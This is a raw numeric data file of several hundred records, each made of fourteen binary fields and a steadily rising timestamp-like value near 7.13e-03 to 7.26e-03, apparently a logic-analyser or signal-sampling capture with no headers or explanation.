0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1271240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1271480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1271560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1271800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1272000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1272280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1272520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1272760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1273000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1273080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1273520e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,7.1273800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1273840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1274040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1274280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1274520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1274760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1275000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1275240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1275480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1275800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1276280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1276520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1276600e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1276760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1277000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1277240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1277480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1277800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1278000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1278280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1278520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1278760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1279000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1279240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1279480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1279560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1280040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1280280e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,7.1280320e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1280360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1280520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1280760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1281000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1281240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1281480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1281800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1282280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1282520e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1282760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1283000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1283080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1283240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1283480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1283800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1284000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1284280e-03 0,1,1,0,0,0,0,0,0,1,0,0,0,0,7.1284520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1284560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1285000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1285240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1285320e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1285480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1285800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1286280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1286520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1286600e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1287040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1287240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1287800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1288040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1288080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1288280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1288520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1288600e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1288760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1289040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1289280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1289560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1289800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1290040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1290280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1290520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1290760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1291040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1291080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1291280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1291560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1291800e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1292040e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1292280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1292520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1292600e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1293040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1293280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1293560e-03 0,1,1,0,0,0,0,0,0,1,0,0,0,0,7.1293800e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1293840e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1294280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1294520e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1294760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1295040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1295080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1295280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1295560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1295800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1296040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1296280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1296520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1296600e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1297040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1297240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1297360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1297560e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1297800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1298040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1298280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1298520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1298760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1299040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1299240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1299560e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1299800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1300040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1300280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1300520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1300760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1301040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1301240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1301520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1301800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1302040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1302280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1302520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1302760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1303040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1303240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1303560e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1303800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1304000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1304280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1304520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1304840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1305120e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1305360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1305600e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1305880e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2549880e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2552480e-03 1,1,1,0,0,0,0,0,0,0,0,1,0,1,7.2552760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2553000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,7.2555960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2556200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,7.2556440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2556720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,7.2556960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2557200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,7.2557480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2557720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,7.2557960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,7.2558200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,1,7.2558280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,1,7.2558720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2558840e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2558960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2559040e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2559240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2559480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2559720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2559960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2560200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2560440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2560680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2560960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2561200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2561480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2561720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2561960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2562000e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2562440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2562720e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,7.2562760e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2562800e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2562960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2563160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2563240e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2563720e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2563960e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,7.2564000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2564040e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2564200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2564440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2564680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2564920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2565160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2565440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2565680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2565960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2566200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2566440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2566680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2566920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2567160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2567440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2567680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2567960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2568200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2568440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2568680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2568920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2569160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2569440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2569480e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2569960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2570200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2570280e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2570440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2570680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2570960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2571160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2571440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2571680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2571960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2572200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2572440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2572680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2572960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2573200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2573440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2573720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2573960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2574200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2574440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2574680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2574760e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2575240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2575480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2575560e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2575720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2575960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2576200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2576440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2576680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2576960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2577000e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2577480e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2577720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2577800e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2577960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2578200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2578280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2578720e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2578960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2579040e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2579480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2579720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2580200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2580440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2581000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2581240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2581280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2581720e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2581960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2582040e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2582440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2582720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2582960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2583200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2583480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2583720e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2583760e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2583960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2584200e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2584440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2584680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2584760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2585240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2585480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2585960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2586200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2586440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2586680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2586960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2587200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2587480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2587720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2587960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2588200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2588440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2588680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2588960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2589200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2589480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2589720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2589960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2590200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2590440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2590680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2590760e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2591240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2591480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2591560e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2591720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2591960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2592200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2592440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2592680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2592960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2593200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2593440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2593480e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2593960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2594200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2594280e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2594440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2594680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2594960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2595160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2595440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2595680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2595960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2596200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2596280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2596680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2596920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2597000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2597160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2597440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2597680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2597960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2598200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2598440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2598680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2598920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2599240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2599480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2599720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2599960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2600040e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2600520e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2600760e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,7.2600800e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2600840e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2601000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2601240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2601480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2601720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2601960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2602240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2602280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2602760e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2603000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2603080e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2603240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2603480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2603720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2603960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2604240e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2604480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2604760e-03 1,1,1,0,0,0,0,0,0,1,0,0,0,0,7.2605000e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2605040e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2605480e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2605720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2605800e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2605960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2606240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2606280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2606760e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2607000e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2607240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2607480e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2607720e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2607960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2608040e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2608520e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2608760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2609000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2609240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2609480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2609720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2609960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2610240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2610480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2610760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2611000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2611240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2611480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2611720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2611960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2612240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2612480e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2612760e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2613240e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2613480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2613560e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2613720e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2613960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2614040e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,7.2614520e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,7.2614760e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,7.2614800e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2614840e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,7.2615000e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,7.2615240e-03 